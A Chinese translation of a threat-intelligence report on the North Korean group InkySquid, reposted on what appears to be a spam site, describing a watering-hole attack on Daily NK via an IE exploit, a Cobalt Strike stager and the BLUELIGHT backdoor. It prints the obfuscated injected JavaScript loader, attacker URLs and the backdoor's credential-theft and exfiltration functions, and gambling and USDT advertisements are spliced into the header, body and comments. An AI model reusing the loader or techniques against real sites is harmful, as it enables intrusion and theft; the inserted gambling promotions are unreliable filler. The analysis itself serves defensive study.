首页 科技内容详情
足球免费推荐(www.zq68.vip):朝鲜InkySquid APT组织行使浏览器破绽熏染受害者

足球免费推荐(www.zq68.vip):朝鲜InkySquid APT组织行使浏览器破绽熏染受害者

分类:科技

网址:

反馈错误: 联络客服

点击直达

皇冠最新登陆网址

www.22223388.com)实时更新发布最新最快的皇冠最新登陆代理线路网址、皇冠最新登陆会员线路网址、皇冠最新备用登录网址、皇冠最新手机版登录网址。

,

朝鲜InkySquid APT组织行使浏览器破绽熏染受害者。

2021年4月,Volexity研究职员识别出了通过www.dailynk[.]com网站加载到恶意子域名的jquery[.]services可疑代码。加载恶意代码的URL包罗:

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

这些URL指向的是Daily NK网站使用的正当文件,然则内容被攻击者修改了,其中包罗重定向用户从攻击者控制的域名jquery[.]services加载恶意JS。攻击者控制的代码只加入了很短的时间就被移除了,使得攻击者流动的识别变得异常难题。

CVE-2020-1380

Volexity研究职员发现攻击者行使的首个破绽是CVE-2020-1380,一个IE 0 day破绽行使。攻击者在Daily NK网站的下述正当文件中加入了一行代码:

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

加入到Daily NK网站的混淆的代码如下:

function vgrai(){var e=document.createElement("script");e.src=fecet("w6625I>>7x=y37t4;=5t48xrt5>4t52105x8t<t:6t0s=/x0=y5",15),document.head&&document.head.appendChild(e)}function vdgie(){const e=window.navigator.userAgent,t=e.indexOf("rv:11.0 "),i=e.indexOf("Trident/");return t>0||i>0}vdgie()&&vgrai();

加入以上代码后,若是用户用IE来接见Daily NK,页面就会从以下URL加载其他的JS文件:

hxxps://ui.jquery[.]services/responsive-extend.min.js

请求时,由于有准确的IE User-Agent,主机就会作为其他混淆的JS代码。初始重定向后,攻击者会选择将恶意代码隐藏在正现代码中。在本例中,攻击者使用了"bPopUp" JS库。这一选择具有2个效果:

◼剖析JS的人可能会误以为其是正当的,由于大多数代码都是非恶意的;

◼识别恶意JS代码的自动化解决方案也可能会误以为这些代码是非恶意的,由于代码大部门可以与正当库内容匹配。

攻击者使用的破绽行使代码中还包罗许多混淆在变量中的字符串,以使其显得像正当的SVG内容。攻击者隐藏字符串的示例如图1所示:


图 1. SVG变量中混淆的字符串

为解密这些字符串,需要执行以下步骤:

◼通过M43.2字符串将path变量中的d属性中的数据支解开来;

◼将支解出的数据的每个元素通过空格符再次支解,会获得一个数字列表;

◼将这些数字转成整数;

◼若是整数大于30,就减去17,并加到天生的字符串中。若是整数小于即是30,就抛弃该数字。

总的来看,一共使用了3个假的SVG工具。一旦这些工具中的字符串替换为JS,识别破绽行使就很容易了。解密和替换后的代码如图2所示:


图 2. CVE-2020-1380实现

代码对应的是TrendMicro研究职员宣布的CVE-2020-1380破绽PoC代码。

乐成行使后,JS会使用相同的方式来解密最终的SVG变量,最终天生一个十六进制编码的Cobalt Strike stager,然后解码和执行。本例中,下载其他shellcode的URL包罗:

◼hxxps://ui.jquery[.]services/swipeout.min.js

◼hxxps://ui.jquery[.]services/swipeout.min.css

◼hxxps://ui.jquery[.]services/slider.min.css

BLUELIGHT

在另一个样本中,攻击者使用jquery[.]services子域名来存放一个新的恶意软件家族。文件存放位置为:

足球免费推荐

免费足球贴士网(www.zq68.vip)是国内最权威的足球赛事报道、预测平台。免费提供赛事直播,免费足球贴士,免费足球推介,免费专家贴士,免费足球推荐,最专业的足球心水网。

hxxps://storage.jquery[.]services/log/history

history文件是一个XOR编码的定制恶意软件副本,恶意软件开发者和Volexity都将其命名为BLUELIGHT。命名依据是恶意软件PDB字符串:

E:\Development\BACKDOOR\ncov\Release\bluelight.pdb

BLUELIGHT是Cobalt Strike乐成流传后的第二个payload。BLUELIGHT恶意软件使用差其余云服务提供商作为C2。恶意软件样本使用Microsoft Graph API举行C2操作。最最先的时刻,BLUELIGHT使用硬编码的参数来举行oauth 2 token认证。客户端认证后,BLUELIGHT就会在OneDrive appfolder文件夹下确立子目录,确立的子目录名有:

logo

normal

background

theme

round

文件夹和子目录确立后,就会以JSON工具的花样来网络以下信息:

用户名

盘算机名

操作系统版本

Web IP

默认接口的内陆IP

内陆时间

植入的二进制文件是32位照样64位

历程SID授权挂号

历程文件名

安装的反病毒软件列表

受熏染的机械是否运行虚拟机

这些数据会经由XOR编码为一个二进制blob并上传。所有上传的文件都市以.jpg作为扩展,差其余子目录和文件名解释差异类型的下令数据。

C2循环在初始上传侦查数据后最先,约莫30秒循环一次。前5分钟内,每个循环会截图,并以时间戳作为文件名上传到normal子目录。5分钟后,截图每隔5分钟上传一次。

在每个循环中,客户端会通过美剧background子目录来查询新的下令。文件名解释要执行的下令,文件的内容提供下令相关的进一步信息。支持的下令包罗:

执行和下载shellcode

下载和启动可执行文件,然后上传程序输出

获取IE、Edge、Chrome、Naver Whale等支持的浏览器中的cookie和密码数据库

递归检索路径和上传文件元数据;

发生一个历程来递归检索路径,以zip文件形式上传文件;

中止文件上传线程。

卸载。

下令文件在处置后会被删除,大多数下令天生的文件会上传到round目录。但zip upload会使用theme子目录。

本文翻译自:https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/
  • 皇冠下载 @回复Ta

    2021-09-04 00:08:33 

    www.22223388.com)实时更新发布最新最快最有效的新2网址和新2最新网址,包括新2手机网址,新2备用网址,皇冠最新网址,新2足球网址,新2网址大全。这写的也太好了。

    • usdt套利(www.usdt8.vip) @回复Ta

      2021-09-09 15:35:53 

      新2信用平台出租rent.22223388.com

      皇冠运营平台(rent.22223388.com)是皇冠(正网)接入菜宝钱包的TRC20-USDT支付系统,为皇冠代理提供专业的网上运营管理系统。系统实现注册、充值、提现、客服等全自动化功能。采用的USDT匿名支付、阅后即焚的IM客服系统,让皇冠代理的运营更轻松更安全。

      盼着更新呢

发布评论